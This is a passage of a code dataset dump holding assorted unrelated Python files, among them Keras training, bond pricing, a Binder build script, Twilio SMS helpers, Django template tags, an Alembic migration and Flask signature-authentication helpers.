훈련\nmodel.compile(loss=\"binary_crossentropy\", optimizer=\"adam\", metrics=[\"acc\"])\n\nes = EarlyStopping(monitor='val_loss',patience=100,mode='auto')\nmodelpath = './model/keras64.hdf5'\ncp = ModelCheckpoint(filepath=modelpath, monitor='val_loss',\n save_best_only=True, mode='auto')\nmodel.fit(x_train,y_train,epochs=500,batch_size=32,verbose=2,callbacks=[es,cp],validation_data=(x_val,y_val)) \n\n# ���델 불러오기\nmodel = load_model('./model/keras64.hdf5')\n\n#4. 평가\nloss,acc = model.evaluate(x_test,y_test,batch_size=32)\nprint(\"loss : \",loss)\nprint(\"acc : \",acc)\n\n#5. 
예측\nresult = model.predict(x_pred)\n\n# print(\"예측값 : \", result.T.reshape(10,))\n# print(\"실제값 : \", y_pred)\n\ny_predicted = (result > 0.5).astype(int).reshape(-1) # threshold the single sigmoid column at 0.5; np.argmax over an (N,1) array would always return 0\n\ny_predicted = list(map(int, y_predicted)) # for readability\ny_pred = list(map(int, y_pred)) # for readability\n\nprint(\"예측값 : \", y_predicted)\nprint(\"실제값 : \", y_pred)\n\n'''\nloss :  0.8301668763160706\nacc :  0.6321839094161987\n예측값 :  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n실제값 :  [1, 0, 1, 1, 1, 1, 0, 1, 1, 1]\nloss :  0.6671748757362366\nacc :  0.6264367699623108\n예측값 :  [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n실제값 :  [1, 0, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]\n'''","sub_path":"keras/keras64_ImageDataGene2.py","file_name":"keras64_ImageDataGene2.py","file_ext":"py","file_size_in_byte":3031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"328611659","text":"from sympy import solve, symbols\n\n\npresent_value = float\ninterest = float\n\n\ndef coupon_bond_p(cr, f, n, i) -> present_value:\n    '''\n    >>> coupon_bond_p(0.1, 1000, 8, 0.1225)\n    889.2\n    '''\n    p=0\n    c = f * cr\n    for j in range(1, n+1):\n        p += c/(1+i)**j\n    return round((p + f/(1+i)**n), 2)\n\n\ndef coupon_bond_i(p, cr, f, n) -> interest:\n    '''\n    >>> coupon_bond_i(889.2, 0.1, 1000, 8)\n    0.1225\n    '''\n    i = symbols('i', positive=True)\n    x = 0\n    c = f * cr\n    for j in range(1, n+1):\n        x += c/(1+i)**j\n    return round(solve(p - (x + f/(1+i)**n), i)[0], 4)\n\n\ndef pv_cf(cf, i, n) -> present_value:\n    '''\n    >>> pv_cf(110, 0.1, 1)\n    100.0\n    '''\n    return round((cf / (1+i)**n), 2)","sub_path":"financial_calculation.py","file_name":"financial_calculation.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"97359501","text":"#!/usr/bin/env python3\n\nimport glob\nimport os\nimport platform\nimport sys\nimport shutil\nimport subprocess\nimport re\nimport multiprocessing\nimport itertools\nfrom contextlib import contextmanager\n\n\n\n# Overall script settings\nthis_project_package = f'{os.getcwd()}/bdsg'\nthis_project_source = f'{this_project_package}/src'\nthis_project_include = f'{this_project_package}/include'\nthis_project_deps = f'{this_project_package}/deps' # Now deps come from submodules.\nbindings_dir = f'{this_project_package}/cmake_bindings'\nthis_project_namespace_to_bind = 'bdsg'\npython_module_name = 'bdsg'\n\n# We have one global notion of what an include looks like\nINCLUDE_REGEX = re.compile('^\s*#include\s+([\"<])(.*)([\">])')\n# We have one master list of source code extensions\nSOURCE_EXTENSIONS = ['hpp', 'cpp', 'h', 'cc', 'c']\n\ndef clone_repos():\n    ''' download the most recent copy of binder from git '''\n    if not glob.glob(\"binder\"):\n        print(\"Binder not found, cloning repo...\")\n        subprocess.check_call(['git', 'clone', 'https://github.com/RosettaCommons/binder.git', 'binder'])\n        parent = os.getcwd()\n        os.chdir('binder')\n        subprocess.check_call(['git', 'checkout', 'ee2ecff151d125c3add072a7765aebad6f42a70d'])\n        os.chdir(parent)\n\ndef build_binder():\n    '''\n    Check for binder executable in the location we expect it.\n    If it's not there, build binder with the included script.\n    Expects to run in the binder directory.\n    :return: location of executable, relative to project directory\n    '''\n    if not glob.glob(\"./build/*/*/bin/*\"):\n        print(\"Binder not compiled, using packaged build.py...\")\n        # Make Binder use our pybind11 version\n        subprocess.check_call(['sed', '-i', \"s/^_pybind11_version_ 
= .*/_pybind11_version_ = '5b0a6fc2017fcc176545afe3e09c9f9885283242'/g\", 'build.py'])\n # TODO: Use CPU counting that accounts for container quotas?\n subprocess.check_call([sys.executable, 'build.py', '--jobs', str(multiprocessing.cpu_count())])\n return \"binder/\" + glob.glob('./build/*/*/bin/')[0] + \"binder\"\n\ndef all_sources_and_headers(include_deps=False):\n '''\n Find all source or include files relevant to the project.\n Yields their paths.\n \n Note that we count the libhandlegraph sources as part of this project's\n sources. We include them even if include_deps is false and we aren't\n including the other dependencies.\n '''\n \n # And the paths we want to look in.\n # Always include libhandlegraph.\n paths = [f'{this_project_source}/**/*', f'{this_project_include}/**/*', f'{this_project_deps}/libhandlegraph/src/**/*']\n if include_deps:\n # Include all dependencies if asked\n paths.append(f'{this_project_deps}/**/*')\n # Get an iterable of glob iterables that search all combinations\n all_globs = (glob.glob(f'{f}.{e}', recursive=True) for f, e in itertools.product(paths, SOURCE_EXTENSIONS))\n # Deduplicate overlapping globs\n seen = set()\n for filename in itertools.chain.from_iterable(all_globs):\n if filename not in seen:\n yield filename\n seen.add(filename)\n \n # files = list()\n # searchroot = os.path.abspath(f'{this_project_source}/../')\n # for (root,dirs,fils) in os.walk(searchroot):\n # for fl in fils:\n # if(fl.endswith((\"hpp\",\"cpp\",\"h\",\"cc\",\"c\")) and (\"src\" in root or \"include\" in root)):\n # files.append(root+\"/\"+fl)\n # print(f'found source files {files}')\n # for filename in files:\n \n \n\n@contextmanager\ndef clean_includes():\n '''\n Goes through source code and replaces all quote-format includes with carrot-style includes on entry.\n\n Reverts changes on exit.\n '''\n changes_made = dict()\n # find instances of includes we need to change\n for filename in all_sources_and_headers():\n changes_made[filename] = list()\n with open(filename, 'r') as fh:\n for line in fh:\n match = INCLUDE_REGEX.match(line)\n if match:\n replacement = line[:match.start()] + f'#include <{match.group(2)}>' + line[match.end():]\n changes_made[filename].append((line, replacement))\n if not changes_made[filename]:\n del changes_made[filename]\n # edit files we need to alter and then resave them\n for filename in changes_made.keys():\n filedata = \"\"\n listInd = 0\n with open(filename, 'r') as fh:\n for line in fh:\n if listInd < len(changes_made[filename]) and line == changes_made[filename][listInd][0]:\n filedata += changes_made[filename][listInd][1]\n listInd += 1\n else:\n filedata += line\n with open(filename, 'w') as fh:\n fh.write(filedata)\n try:\n yield\n finally:\n for filename in changes_made.keys():\n filedata = \"\"\n listInd = 0 \n with open(filename, 'r') as fh:\n for line in fh:\n if listInd < len(changes_made[filename]) and line == changes_made[filename][listInd][1]:\n filedata += changes_made[filename][listInd][0]\n listInd += 1\n else:\n filedata += line\n with open(filename, 'w') as fh:\n fh.write(filedata)\n \n\ndef make_all_includes():\n '''\n Generates an .hpp file with all includes in this project that need to be bound.\n We collect all the include directives from this project's sources.\n '''\n \n all_includes = []\n all_include_filename = 'all_cmake_includes.hpp'\n \n for filename in all_sources_and_headers(include_deps=False):\n # Then for each file found by any search\n with open(filename, 'r') as fh:\n for line in fh:\n if 'BINDER_IGNORE' 
in line:\n # Skip includes that are maybe not available on all systems\n continue\n # Look at each line\n match = INCLUDE_REGEX.match(line)\n if match:\n # This is an include directive that makes sense to include here. Parse it\n is_relative = match.group(1) == '\"'\n included_path = match.group(2)\n assert (match.group(1) == '\"') == (match.group(3) == '\"'), \"Mismatched include delimiters in \" + filename + \" for \" + included_path\n \n # Relative includes arent really relative paths so we can't really resolve them.\n \n # Just collect all the includes as <>\n all_includes.append(f'#include <{included_path}>')\n all_includes = list(set(all_includes))\n # This is to ensure that the list is always the same and doesn't\n # depend on the filesystem state. Not technically necessary, but\n # will cause inconsistent errors without it.\n all_includes.sort()\n with open(all_include_filename, 'w') as fh:\n # Start by always including the binding-generation-time hook file, with\n # things Binder needs to see to generate good bindings.\n fh.write('#include \\n')\n for include in all_includes:\n fh.write(f'{include}\\n')\n return all_include_filename\n \n \ndef postprocess_bindings():\n '''\n Modify generated bindings files to correct Binder's STL-version-dependent code to portable code.\n '''\n \n # We apply each of these to all source files with sed.\n transformations = ['s/class std::__cxx11::basic_string/std::string/g', # We can't leave \"class\" in front of a non-template\n 's/std::__cxx11::basic_string/std::string/g']\n # TODO: Add transformations to catch problems from libc++ STL\n \n for (directory, subdirectories, files) in os.walk(bindings_dir):\n for filename in files:\n if os.path.splitext(filename)[1].lstrip('.') in SOURCE_EXTENSIONS:\n # For each source file, get its full path from where our process is\n full_path = os.path.join(directory, filename)\n for transformation in transformations:\n # Apply all the transformations\n subprocess.check_call(['sed', \"-i.bak\", transformation, full_path])\n os.unlink(full_path + '.bak')\n\n\ndef make_bindings_code(all_includes_fn, binder_executable):\n ''' runs the binder executable with required parameters '''\n # Find all the include directories for dependencies.\n # Some dependency repos have an include and some have an src/include.\n # BBHash and sparsepp have weird project structures and needs to be handled specially.\n proj_include = (glob.glob(f'{this_project_deps}/*/include') +\n glob.glob(f'{this_project_deps}/*/src/include') +\n [f'{this_project_deps}/sparsepp',\n f'{this_project_deps}/BBHash'])\n # proj_include = \" -I\".join(proj_include)\n proj_include = [f'-I{i}' for i in proj_include]\n \n command = [binder_executable,\n \"--root-module\", python_module_name,\n \"--prefix\", f'{bindings_dir}/',\n '--bind', this_project_namespace_to_bind,\n \"--config\", \"config.cfg\",\n all_includes_fn,\n \"--\",\n \"-std=c++14\",\n f'-I{this_project_include}']\n if platform.system() == 'Darwin':\n # We need the MacOS SDK, which provides the C standard library and also a C++ STL, at least as of Apple Clang 14.\n sdk_path=subprocess.check_output(['xcrun', '-sdk', 'macosx', '--show-sdk-path']).decode('utf8').strip()\n command.append('-isysroot' + sdk_path)\n # Also make sure to look for libomp from macports or homebrew, like CMakeLists.txt does\n command.append('-I/opt/local/include/libomp')\n command.append('-I/usr/local/include')\n\n # Find Jansson\n jansson_flags = subprocess.check_output(['pkg-config', '--cflags', 
'jansson']).decode('utf-8').strip().split(' ')\n command += jansson_flags\n\n command = command + proj_include\n command.append(\"-DNDEBUG\")\n command.append(\"-v\")\n print('BINDER COMMAND:', ' '.join(command))\n \n shutil.rmtree(bindings_dir, ignore_errors=True)\n os.mkdir(bindings_dir)\n subprocess.check_call(command)\n \n # Do some post-processing on the bindings\n postprocess_bindings()\n \n\n \ndef main():\n clone_repos()\n parent = os.getcwd()\n os.chdir(\"binder\")\n binder_executable = build_binder()\n os.chdir(parent)\n with clean_includes():\n all_includes_fn = make_all_includes()\n make_bindings_code(all_includes_fn, binder_executable)\n\nif __name__ == '__main__':\n main()\n","sub_path":"make_and_run_binder.py","file_name":"make_and_run_binder.py","file_ext":"py","file_size_in_byte":10805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"68548617","text":"import os\ndef count_word(path):\n with open(path,'r') as f:\n lines = f.readlines()\n words_num = 0\n for line in lines:\n if line == '\\n':\n continue\n else:\n for symbol in ['\\n','#',' ']:\n line = line.strip(symbol)\n words = line.split(' ')\n words_num += len(words)\n return words_num\n\nfn = \"C:/Users/lenovo/Desktop/readme.md\"\nif os.path.isfile(fn):\n words_num = count_word(fn)\n print('There are {} words in file {}.'.format(words_num,fn))\nelse:\n print('The file does not exist.')\n","sub_path":"f.py","file_name":"f.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"391878312","text":"from datetime import date\r\ndays=['Monday','Tuesday','Wednesday','Thursday','Friday','Saturday','Sunday']\r\nprint(days[date.weekday(date.today())])\r\nimport webbrowser\r\nwebbrowser.open('https://www.youtube.com/watch?v=QJbpJQscn9E&t=113s')\r\nimport os\r\nos.rename('file.txt','file.jpg')\r\n\r\n\r\n# regex assignment\r\n\r\n#ques 1\r\nimport re\r\n\r\nemails=''' abc@gmail.com\r\n xyz@yahoo.com\r\n jainyz.yahoo.com\r\n str892@gmail.@com\r\n dj_a@hotmail.com'''\r\npattern= re.compile('[a-zA-Z0-9_.]+@{1}[a-zA-Z0-9]+\\.[a-zA-Z0-9]+')\r\nmatches= pattern.findall(emails)\r\nfor i in matches:\r\n print(i)\r\n#ques 2\r\nnumbers=''' +91123456789 +8 23658974 +91-987654321 +91-8652398745 +91-6230525302 '''\r\npattern = re.compile(r'[+]91-[6-9][0-9]{9}')\r\nmatches = pattern.findall(numbers)\r\nfor i in matches:\r\n print(i)\r\n","sub_path":"assign11.py","file_name":"assign11.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"295618019","text":"class Solution:\n \"\"\"\n @param: chars: The letter array you should sort by Case\n @return: nothing\n \"\"\"\n def sortLetters(self, chars):\n length = len(chars)\n l_index, r_index = 0, length - 1\n while l_index < r_index:\n if chars[l_index].islower():\n l_index += 1\n continue\n if chars[r_index].isupper():\n r_index -= 1\n continue\n chars[l_index], chars[r_index] = chars[r_index], chars[l_index]\n l_index += 1\n r_index -= 1\n","sub_path":"lc0049_sort_letters_by_case.py","file_name":"lc0049_sort_letters_by_case.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"599788333","text":"from pytorch_lightning import Trainer, seed_everything\n\n\n\n\nclass AlgorithmTrainer(Trainer):\n\n \"\"\"\n this class overides the trainer training loop in order to add 
custom\n    reinforcement learning functionality\n    \"\"\"\n\n    def __init__(self):\n        super(AlgorithmTrainer, self).__init__()\n\n    # overrides Trainer.train from pytorch_lightning\n    def train(self):\n        self.run_sanity_check(self.get_model())\n\n        # enable train mode\n        model = self.get_model()\n        model.train()\n        torch.set_grad_enabled(True)\n\n        # reload data when needed\n        self.train_loop.reset_train_val_dataloaders(model)\n\n        # hook\n        self.train_loop.on_train_start()\n\n        try:\n            # run all epochs\n            for epoch in range(self.current_epoch, self.max_epochs):\n\n                # reset train dataloader\n                if self.reload_dataloaders_every_epoch:\n                    self.reset_train_dataloader(model)\n\n                # hook\n                self.train_loop.on_train_epoch_start(epoch)\n\n                # run train epoch\n                self.train_loop.run_training_epoch()\n\n                if self.max_steps and self.max_steps <= self.global_step:\n\n                    # hook\n                    self.train_loop.on_train_end()\n                    return\n\n                # update LR schedulers\n                self.optimizer_connector.update_learning_rates(interval='epoch')\n\n                # early stopping\n                met_min_epochs = epoch >= self.min_epochs - 1\n                met_min_steps = self.global_step >= self.min_steps if self.min_steps else True\n\n                if self.should_stop:\n                    if (met_min_epochs and met_min_steps):\n                        self.train_loop.on_train_end()\n                        return\n                    else:\n                        log.info('Trainer was signaled to stop but required minimum epochs'\n                                 f' ({self.min_epochs}) or minimum steps ({self.min_steps}) has'\n                                 ' not been met. Training will continue...')\n\n            # hook\n            self.train_loop.on_train_end()\n\n        except KeyboardInterrupt:\n            rank_zero_warn('Detected KeyboardInterrupt, attempting graceful shutdown...')\n\n            # user could press ctrl+c many times... only shutdown once\n            if not self.interrupted:\n                self.interrupted = True\n                self._state = TrainerState.INTERRUPTED\n                self.on_keyboard_interrupt()\n\n            # hook\n            self.train_loop.on_train_end()","sub_path":"src/algorithm/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":2565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"498837819","text":"# Reads 4 grades, then prints the grades and their average\r\n\r\nnotas = []\r\ncontador = 0\r\nsoma = 0\r\n\r\nwhile contador < 4:\r\n    n = float(input('Digite a nota: '))\r\n    notas.append(n)\r\n    soma += n\r\n    contador += 1\r\n\r\nprint('Notas: ', notas)\r\nprint('Média: %5.2f' % (soma / contador))\r\n\r\n","sub_path":"TWP200/TWP274.py","file_name":"TWP274.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"150168825","text":"s3 = Sentence('Pig and Pepper')  # Obtain an iterator from s3.\nit = iter(s3)\nit  # <iterator object at 0x...>\n\nnext(it)  # 'Pig'\nnext(it)  # 'and'\nnext(it)  # 'Pepper'\nnext(it)  # StopIteration\n\n# Once exhausted, an iterator becomes useless.\nlist(it)  # []\n\n# To go over the sentence again, a new iterator must be built.\nlist(iter(s3))  # ['Pig', 'and', 'Pepper']\n","sub_path":"src/language_ref/control/iterator.py","file_name":"iterator.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"172005344","text":"import os\n\n# path to our original dataset directory\nORIGIN_DATASET = \"Food-11\"\n\n# path to the new directory containing our images \n# after the training and testing split\nBASE_PATH = \"dataset\"\n\n# names of training, testing, validation directories\nTRAIN = \"training\"\nTEST = \"evaluation\"\nVAL = \"validation\"\n\n# list of class label names\nCLASSES = [\"Bread\", \"Dairy product\", \"Dessert\", \"Egg\", \"Fried food\",\n\t\"Meat\", \"Noodles/Pasta\", 
\"Rice\", \"Seafood\", \"Soup\",\n\t\"Vegetable/Fruit\"]\n\n# set the batch size\nBATCH_SIZE = 32\n\n# label encoder path\nLE_PATH = os.path.sep.join([\"output\", \"le.cpickle\"])\n\n# output directory to store extracted features (in .csv format)\nBASE_CSV_PATH = \"output\"\n\n# path to the serialized model after training\nMODEL_PATH = os.path.sep.join([\"output\", \"food11.model\"])\n\n# path to the output training history plots\nUNFROZEN_PLOT_PATH = os.path.sep.join([\"output\", \"unfrozen.png\"])\nWARMUP_PLOT_PATH = os.path.sep.join([\"output\", \"warmup.png\"])","sub_path":"Food Classification/Fine-tuning Food Classification with VGG16/utilities/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"554272061","text":"__author__ = 'Luke'\nfrom django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^album/create/$', views.album_create, name='album_create'),\n url(r'^album/(?P[\\w-]+)/$', views.album_detail, name='album_detail'),\n url(r'^album/(?P[\\w-]+)/edit/$', views.album_edit, name='album_edit'),\n url(r'^album/(?P[\\w-]+)/delete/$', views.album_delete, name='album_delete'),\n url(r'^album/$', views.album_list, name='album_list'),\n url(r'^$', views.chart_view, name='chart'),\n\n]\n","sub_path":"website/music/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"240457886","text":"#!/usr/bin/env python\n\nimport argparse\nfrom i4media.logger import *\n\nimport i4media.core\nimport i4media.streaming\nimport i4media.restapi\n\n\nparser = argparse.ArgumentParser(description='i4Media-twitter Service Controller')\nparser.add_argument(\n '-s',\n '--stream',\n default=False,\n action='store_true',\n help='Starts a Streaming Service & Bridge')\nparser.add_argument(\n '-r',\n '--rest',\n default=False,\n action='store_true',\n help='Starts REST Api (Single')\nargs = parser.parse_args()\n\nif __name__ == '__main__':\n p = i4media.core.Process()\n services = []\n if args.stream:\n services.append(i4media.streaming.StreamingService())\n p.add('streaming', services[-1].stream)\n services.append(i4media.streaming.StreamingBridge())\n p.add('bridge', services[-1].start)\n if args.rest:\n services.append(i4media.restapi.RestApiBridge())\n p.add('rest', services[-1].start)\n p.start()\n","sub_path":"control.py","file_name":"control.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"538335099","text":"# Copyright 2021 Canonical\n# See LICENSE file for licensing details.\n\nimport unittest\n\nfrom charm import PeerRelationDemoCharm\nfrom ops.testing import Harness\n\n# from unittest.mock import Mock\n\n\nclass TestCharm(unittest.TestCase):\n def test_config_changed(self):\n harness = Harness(PeerRelationDemoCharm)\n self.addCleanup(harness.cleanup)\n harness.begin()\n self.assertEqual(list(harness.charm._stored.things), [])\n harness.update_config({\"thing\": \"foo\"})\n self.assertEqual(list(harness.charm._stored.things), [\"foo\"])\n","sub_path":"tests/test_charm.py","file_name":"test_charm.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"149911706","text":"# functions that interact with Twilio\n# import this into server.py\n\nfrom 
twilio.twiml.messaging_response import MessagingResponse\nfrom twilio.rest import Client\nimport os\n\naccount_sid = os.environ['ACCOUNT_SID']\nauth_token = os.environ['AUTH_TOKEN']\nclient = Client(account_sid, auth_token)\n\n\ndef sms_volunteer_request(message, phone_nums):\n    \"\"\"Connects organizations on our app to the Twilio functionality.\n\n    Org message is passed in (request is created by info that orgs supply\n    on webpage, and is put together as a string before this function is called.)\n    Phone numbers of interested volunteers are passed in as a list from\n    the database.\n    \"\"\"\n\n    # can add media url below body if needed\n    # media_url=\"https://climacons.herokuapp.com/clear.png\"\n\n    for num in phone_nums:\n        call = client.messages.create(\n            to=num,\n            from_='+15109441564',\n            body=message,\n        )\n\n        print(call.sid)\n\n\n# NOTE: 'app' is the Flask application object; it is expected to be defined in\n# the server module that imports this file (see header comment above).\n@app.route(\"/sms\", methods=['GET', 'POST'])\ndef sms_ahoy_reply():\n    \"\"\"Respond to incoming messages with a friendly SMS.\"\"\"\n    # Start our response\n    resp = MessagingResponse()\n\n    # Add a message\n    resp.message(\"Ahoy! Thanks so much for your message.\")\n\n    return str(resp)\n\n\n# sample data to call functions\nmessage = 'Hackbright needs 30 volunteers today from 2pm to 7pm. Can you make it?'\nnumbers = os.environ['numbers_list']\n\n# functions\nsms_volunteer_request(message, numbers)\n","sub_path":"twilio_functions.py","file_name":"twilio_functions.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
{"seq_id":"618418937","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom django import template\nfrom blog.models import Category, Post, Tag\nimport math\n\nregister = template.Library()\nNAME_LEN_SIDEBAR = 30\n\n\n@register.inclusion_tag('blog/show_current_categories.html')\ndef show_current_categories(is_detail=False, post=None):\n    if is_detail:\n        categories = post.category\n    else:\n        categories = Category.objects.all()\n    pre_half = categories[:math.ceil(categories.count() / 2)]\n    lst_half = categories[math.ceil(categories.count() / 2):]\n    return {\n        'categories': categories,\n        'pre_half': pre_half,\n        'lst_half': lst_half,\n        'is_detail': is_detail\n    }\n\n\n@register.inclusion_tag('blog/show_current_tags.html')\ndef show_current_tags(is_detail=False, post=None):\n    if is_detail:\n        tags = post.tags.all()\n    else:\n        tags = Tag.objects.all()\n    pre_half = tags[:math.ceil(tags.count() / 2)]\n    lst_half = tags[math.ceil(tags.count() / 2):]\n    return {\n        'tags': tags,\n        'pre_half': pre_half,\n        'lst_half': lst_half,\n    }\n\n\n@register.inclusion_tag('blog/most_viewed_posts.html')\ndef most_viewed_posts():\n    posts = Post.objects.filter(is_publish=True).order_by('-views')[:5]\n    for p in posts:\n        if len(p.title) > NAME_LEN_SIDEBAR:\n            p.sidebar_name = p.title[:NAME_LEN_SIDEBAR] + '...'\n        else:\n            p.sidebar_name = p.title[:NAME_LEN_SIDEBAR]\n    return {'most_viewed_posts': posts}\n\n\n@register.inclusion_tag('blog/recent_posts.html')\ndef recent_posts():\n    posts = Post.objects.filter(is_publish=True).order_by('-created_time')[:5]\n    for p in posts:\n        if len(p.title) > NAME_LEN_SIDEBAR:\n            p.sidebar_name = p.title[:NAME_LEN_SIDEBAR] + '...'\n        else:\n            p.sidebar_name = p.title[:NAME_LEN_SIDEBAR]\n    return {'recent_posts': 
posts}\n","sub_path":"jase_im/blog/templatetags/blog_template_tags.py","file_name":"blog_template_tags.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"609532063","text":"\"\"\"empty message\n\nRevision ID: e0a00045f6c7\nRevises: a27eeb3b21e0\nCreate Date: 2019-07-19 09:32:14.129277\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'e0a00045f6c7'\ndown_revision = 'a27eeb3b21e0'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('user',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('username', sa.String(), nullable=True),\n sa.Column('email', sa.String(), nullable=True),\n sa.Column('password_hash', sa.String(length=128), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_user_email'), 'user', ['email'], unique=True)\n op.create_index(op.f('ix_user_username'), 'user', ['username'], unique=True)\n op.create_table('set',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.Column('timestamp', sa.DateTime(), nullable=True),\n sa.Column('exercise', sa.String(length=128), nullable=True),\n sa.Column('pounds', sa.Integer(), nullable=True),\n sa.Column('reps', sa.Integer(), nullable=True),\n sa.Column('rpe', sa.Integer(), nullable=True),\n sa.Column('notes', sa.String(length=140), nullable=True),\n sa.Column('bodyweight', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_set_timestamp'), 'set', ['timestamp'], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_index(op.f('ix_set_timestamp'), table_name='set')\n op.drop_table('set')\n op.drop_index(op.f('ix_user_username'), table_name='user')\n op.drop_index(op.f('ix_user_email'), table_name='user')\n op.drop_table('user')\n # ### end Alembic commands ###\n","sub_path":"backend/migrations/versions/e0a00045f6c7_.py","file_name":"e0a00045f6c7_.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"547960244","text":"import binascii\nfrom functools import wraps\nimport json\nfrom flask import request, jsonify\nfrom api import settings\nimport base64\nfrom signature import (\n recover_public_address,\n ValidationError as SignatureValidationError\n)\n\n\ndef is_json_dict(data):\n try:\n json_data = json.loads(data)\n except ValueError:\n return False\n if not isinstance(json_data, dict):\n return False\n return True\n\n\ndef validate_json(f):\n @wraps(f)\n def wrapper(*args, **kw):\n if not is_json_dict(request.data):\n return jsonify({\"error\": 'payload must be a valid json'}), 400\n return f(*args, **kw)\n return wrapper\n\n\ndef restrict_by_ip(f):\n @wraps(f)\n def wrapper(*args, **kw):\n if settings.RESTRICT_BY_IP_ENABLED:\n if request.remote_addr not in settings.ALLOWED_IP_ADDRESSES:\n return jsonify(error='resource is forbidden'), 403\n\n return f(*args, **kw)\n\n return wrapper\n\n\ndef recover_identity(f):\n @wraps(f)\n def wrapper(*args, **kw):\n try:\n caller_identity = decode_authorization_header(request.headers)\n except ValueError as err:\n return jsonify(error=str(err)), 401\n\n kw['caller_identity'] = caller_identity\n return f(*args, **kw)\n\n return wrapper\n\n\ndef decode_authorization_header(headers):\n # Authorization request header format:\n # Authorization: Signature \n authorization = headers.get('Authorization')\n if not authorization:\n raise ValueError('missing Authorization in request header')\n\n authorization_parts = authorization.split(' ')\n if len(authorization_parts) != 2:\n raise ValueError('invalid Authorization header value provided, correct'\n ' format: Signature ')\n\n authentication_type, signature_base64_encoded = authorization_parts\n\n if authentication_type != 'Signature':\n raise ValueError('authentication type have to be Signature')\n\n if signature_base64_encoded == '':\n raise ValueError('signature was not provided')\n\n try:\n signature_bytes = base64.b64decode(signature_base64_encoded)\n except binascii.Error as err:\n raise ValueError('signature must be base64 encoded: {0}'.format(err))\n\n try:\n return recover_public_address(\n request.data,\n signature_bytes,\n ).lower()\n except SignatureValidationError as err:\n raise ValueError('invalid signature format: {0}'.format(err))\n","sub_path":"request_helpers.py","file_name":"request_helpers.py","file_ext":"py","file_size_in_byte":2544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"162525841","text":"\"\"\"Support for iss sensor.\"\"\"\nfrom __future__ import annotations\n\nimport logging\nfrom typing import Any\n\nfrom homeassistant.components.sensor import SensorEntity\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.const import ATTR_LATITUDE, ATTR_LONGITUDE, CONF_SHOW_ON_MAP\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.helpers.entity_platform import AddEntitiesCallback\nfrom homeassistant.helpers.update_coordinator import (\n CoordinatorEntity,\n DataUpdateCoordinator,\n)\n\nfrom . 
